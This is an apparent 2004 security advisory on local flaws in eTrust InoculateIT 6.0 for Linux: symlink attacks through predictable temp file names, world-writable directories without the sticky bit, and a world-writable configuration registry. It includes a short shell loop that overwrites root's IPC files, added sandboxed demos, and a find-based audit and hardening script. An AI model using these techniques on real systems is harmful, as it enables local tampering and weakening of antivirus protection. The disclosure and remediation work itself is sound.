Date: 9 Feb 2004 17:09:55 -0000
From: Rene <[email protected]>
To: [email protected]
Subject: [local problems] eTrust Virus Protection 6.0 InoculateIT for linux
author: l0om <[email protected]>
software: eTrust Virus Protection 6.0 InoculateIT for linux

local phun with etrust antivirus 6.0 inoculateIT linux
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
eTrust InoculateIT 6.0 comes for the following OSes:
-Windows 95/98/ME
-Windows NT 4.0/2000
-Novell NetWare 3.x 4.x 5.x
-Lotus Notes/Domino
-Microsoft Exchange Server
-and finally Linux (SuSE, RedHat, Caldera, TurboLinux)
eTrust is an antivirus program which can scan nearly every file format
for viruses. I have installed the Linux version on my SuSE 9.0 system
and noticed the following security flaws:
1) possible symlink attacks in some scripts
By the way, the env variable $CAIGLBL0000 holds the install root, e.g.
/usr/local/eTrust/. The point is that $CAIGLBL0000/tmp IS world-writable,
and the scripts below create their temp files there (or directly in /tmp)
under predictable names: the PID ($$) or even a fixed name. A local user who
plants a symlink with such a name, pointing at a root-owned file, gets that
file overwritten with the script's output as soon as root runs the script.
ino/scripts/inoregupdate
########################
[...]
tfn=$CAIGLBL0000/tmp/.inoreg.ns.$$
$NETSTAT -i 2>/dev/null | grep -v localhost > $tfn
[...]

scripts/uniftest
################
local=$CAIGLBL0000/tmp
local1=$CAIGLBL0000/scripts
[...]
$CAIGLBL0000/bin/unips > $local/unips.$$
awk -f $local1/uniftest.awk $local/unips.$$
st_rc=$?
rm $local/unips.$$
[...]

scripts/unimove
###############
sed -e "s!$from!$to!g" $fn > /tmp/.unimove.sed   # <-- creates it now
diff $fn /tmp/.unimove.sed > /dev/null
if [ $? != 0 -a -s /tmp/.unimove.sed ];
then
    mv /tmp/.unimove.sed $fn
    rm /tmp/.unimove.sed                          # deletes it when finished
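To make the symlink problem concrete, here is a small self-contained demo. It is an
added example, not code from the advisory or from the eTrust scripts: it rebuilds the
inoregupdate pattern (predictable name in a shared tmp directory, written with a plain
">" redirection) inside a private scratch tree made with mktemp -d, so no real file is
touched, and puts a hardened version next to it. The directory and file names, the
"victim" file and the guessed PID 4242 are all assumptions of the demo.

```sh
#!/bin/sh
# Added demo of the predictable-tempfile symlink attack (not from the advisory
# or from CA's scripts). Runs entirely inside a private scratch tree.

DEMO_ROOT=$(mktemp -d) || exit 1
SHARED_TMP="$DEMO_ROOT/tmp"        # stands in for the world-writable $CAIGLBL0000/tmp
VICTIM="$DEMO_ROOT/victim.conf"    # stands in for a root-owned file the attacker cannot write
mkdir -p "$SHARED_TMP"

# Attacker: guess the PID the privileged script will get and plant a symlink
# under the predictable name before the script runs. A real attacker would
# pre-create links for a whole range of PIDs; here the PID is simply known.
plant_symlink() {
    ln -s "$2" "$1"                # $1 = predictable temp name, $2 = file to clobber
}

# Vulnerable pattern (same shape as inoregupdate): predictable name, opened
# with ">" which follows an existing symlink and truncates whatever it points at.
vuln_write() {
    tfn="$SHARED_TMP/.inoreg.ns.$1"   # $1 plays the role of $$
    echo "script output" > "$tfn"
    rm -f "$tfn"                      # removes the symlink, the victim stays clobbered
}

# Hardened pattern: mktemp picks an unguessable name and creates it with
# O_EXCL, and we refuse to go on if the path turns out to be a symlink anyway.
safe_write() {
    tfn=$(mktemp "$SHARED_TMP/.inoreg.ns.XXXXXX") || return 1
    [ -L "$tfn" ] && return 1
    echo "script output" > "$tfn"
    rm -f "$tfn"
}

# Each scenario resets the victim, lets the attacker plant a link at the name he
# expects, runs the "script" and returns 0 (true) if the victim's content changed.
vulnerable_clobbers_victim() {
    echo "original" > "$VICTIM"
    rm -f "$SHARED_TMP"/.inoreg.ns.*
    plant_symlink "$SHARED_TMP/.inoreg.ns.4242" "$VICTIM"
    vuln_write 4242
    [ "$(cat "$VICTIM")" = "script output" ]
}

hardened_clobbers_victim() {
    echo "original" > "$VICTIM"
    rm -f "$SHARED_TMP"/.inoreg.ns.*
    plant_symlink "$SHARED_TMP/.inoreg.ns.4242" "$VICTIM"   # the guess is useless now
    safe_write
    [ "$(cat "$VICTIM")" = "script output" ]
}

if vulnerable_clobbers_victim; then echo "vulnerable pattern: victim overwritten"; fi
if hardened_clobbers_victim; then echo "hardened pattern: victim overwritten"; else echo "hardened pattern: victim intact"; fi
```

The real fix for the vendor scripts is the same as in safe_write: stop deriving names from
$$ or using fixed names in a shared directory, and let mktemp (or a private, non-world-writable
directory) do the job. The `[ -L ]` test alone is not enough, since a symlink can be planted
between the test and the open; mktemp's O_EXCL creation is what closes the race.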
2) some directories in the tmp directory don't have the sticky bit set
an example:
eTrustAE.lnx/tmp/.caipcs/ # ls -l
drwxrwxrwx  8 root root  240 2004-02-05 09:58 .
drwxrwxrwx  4 root root  160 2004-02-09 16:53 ..
drwxrwxrwx  2 root root   48 2004-02-05 09:54 .file
-rw-r--r--  1 root root 4110 2004-02-05 09:58 ipcrm.log
drwxrwxrwx  2 root root  856 2004-02-05 10:48 .nob_event
drwxrwxrwx  2 root root 1168 2004-02-05 10:48 .nob_mutex
drwxrwxrwx  2 root root   48 2004-02-05 09:54 .nob_sem
drwxrwxrwx  2 root root  384 2004-02-05 10:48 .sem
drwxrwxrwx  2 root root   80 2004-02-05 10:48 .shm

eTrustAE.lnx/tmp/.caipcs # ls -l .sem
drwxrwxrwx  2 root root  384 2004-02-05 10:48 .
drwxrwxrwx  8 root root  240 2004-02-05 09:58 ..
-rw-------  1 root root   20 2004-02-05 10:01 3571729
-rw-------  1 root root    5 2004-02-05 09:58 3702805
-rw-------  1 root root   25 2004-02-05 10:01 3735574
-rw-------  1 root root   25 2004-02-05 10:01 3768343
-rw-------  1 root root   15 2004-02-05 09:58 3801112
This directory holds values which are kind of sensitive, so only root can
read or write them, as the file permissions show. But the parent directory
.sem is world-writable and has no sticky bit set, so any user can delete
these files and replace them with his own: whether a directory entry may be
unlinked or created is decided by the directory's permissions, not by the
file's. The same is true for a handful of directories here.
for example:
badass~:> phun()
{
    # cp -f cannot open the 0600 root-owned file for writing, so it unlinks
    # the entry and creates a new file in its place, which the directory
    # permissions allow
    for i in `ls /usr/local/eTrustAE.lnx/tmp/.caipcs/.sem`; do
        cp -f ~/myblankass.ascii /usr/local/eTrustAE.lnx/tmp/.caipcs/.sem/$i
    done
    echo jupp
}
badass~:> phun
jupp
badass~:>
3) world writeable
With the Linux version of eTrust come some directories which we all know
from Windows: the "registry". It seems like the whole registry tree is
world-writable:
>find ./ -type f -perm -2 -print
./registry/hkey_current_user/software/computerassociates/inoculateit/6.0/local_scanner/macro_cure_action
./registry/hkey_current_user/software/computerassociates/inoculateit/6.0/local_scanner/scan_files
./registry/hkey_current_user/software/computerassociates/inoculateit/6.0/local_scanner/log_infected_files
./registry/hkey_current_user/software/computerassociates/inoculateit/6.0/local_scanner/specified_list
./registry/hkey_local_machine/software/computerassociates/scanengine/path/home
./registry/hkey_local_machine/software/computerassociates/scanengine/path/logs
[...]
The directories have the sticky bit set, therefore we cannot delete or
replace these files, but since the files themselves are world-writable we
can still change the values inside them, and some of those are sensitive.
for example:
cat ./registry/hkey_current_user/software/computerassociates/inoculateit/6.0/local_scanner/specified_list
|COM|DLL|DOT|DOC|EXE|SYS|VXD|XLA|XLS|XLT|XLW|RTF|WIZ|386|ADT|BIN|CBT|CLA|CPL|CSC|DRV|HTM|HTT|JS|MDB|MSO|POT|PPT|SCR|SHS|VBS|VSD|VST|VSS|OCX|HLP|CHM|MSI|VBE|JSE|PIF|BAT|
This key contains a list of file extensions which specifies what files
should be scanned for viruses. A normal user can simply delete all values
except one from this list and make the scanner pretty lame...
Furthermore there are world-writable keys like "windows/currentversion",
with keys which hold the path to the normal binaries ("/usr/bin"). It may be
possible to execute whatever you want on a reboot if you change the right
keys in the right way.
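Both of the permission problems above (2: world-writable directories without the sticky
bit, 3: world-writable files) can be found with two find expressions. The script below is
an added audit helper, not part of the advisory or of the eTrust package: it builds a
scratch tree that mimics the listings quoted above (the tmp/.caipcs/.sem and registry/...
paths are reused, but the tree, its modes and the file contents are constructed for the
demo), reports both classes of problem, and shows the obvious remediation. Whether eTrust
still works once its IPC directories carry the sticky bit and its registry files are no
longer o+w is something to verify against the product, which this demo does not do.

```sh
#!/bin/sh
# Added audit helper (not from the advisory or from eTrust): reports
# world-writable directories lacking the sticky bit, and world-writable
# regular files, under a given install root; harden_tree fixes both.

# Directories that are o+w (0002) but lack the sticky bit (1000): any user
# can unlink or replace entries in them, whatever the files' own modes say.
find_unsticky_dirs() {
    find "$1" -type d -perm -0002 ! -perm -1000 | sort
}

# Regular files writable by everyone: any user can change their contents,
# sticky bit on the parent directory or not.
find_world_writable_files() {
    find "$1" -type f -perm -0002 | sort
}

count_unsticky_dirs()        { find_unsticky_dirs "$1" | wc -l | tr -d ' '; }
count_world_writable_files() { find_world_writable_files "$1" | wc -l | tr -d ' '; }

# Remediation: sticky bit on shared directories (non-owners can then no longer
# delete or rename other users' entries), and drop o+w from the files.
harden_tree() {
    find "$1" -type d -perm -0002 ! -perm -1000 -exec chmod +t {} +
    find "$1" -type f -perm -0002 -exec chmod o-w {} +
}

# Constructed fixture resembling the advisory's listings (modes set explicitly,
# so the result does not depend on umask or on who runs this). Prints the root.
make_fixture() {
    root=$(mktemp -d) || return 1
    reg="$root/registry/hkey_current_user/software/computerassociates/inoculateit/6.0/local_scanner"
    mkdir -p "$root/tmp/.caipcs/.sem" "$reg"
    chmod 1777 "$root/tmp"                               # sticky like a proper /tmp: not reported
    chmod 0777 "$root/tmp/.caipcs" "$root/tmp/.caipcs/.sem"   # the problem from point 2
    echo 20 > "$root/tmp/.caipcs/.sem/3571729"
    chmod 0600 "$root/tmp/.caipcs/.sem/3571729"          # file itself is private, dir is not
    printf '|COM|DLL|EXE|\n' > "$reg/specified_list"
    chmod 0666 "$reg/specified_list"                     # the problem from point 3
    echo "$root"
}

ROOT=$(make_fixture) || exit 1
echo "world-writable dirs without sticky bit:"; find_unsticky_dirs "$ROOT"
echo "world-writable files:";                  find_world_writable_files "$ROOT"
harden_tree "$ROOT"
echo "after hardening (both lists should be empty):"
find_unsticky_dirs "$ROOT"; find_world_writable_files "$ROOT"
rm -rf "$ROOT"
```

Point the two find functions at a real install root (e.g. $CAIGLBL0000) to get the same
report for an actual installation; the `! -perm -1000` clause is what separates a proper
sticky tmp directory from the .caipcs subdirectories shown above.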
have phun!
feel phree!
life phat!
YaCP - (Y)ast (a)nother (C)yber(P)unk
--l0om
--www.excluded.org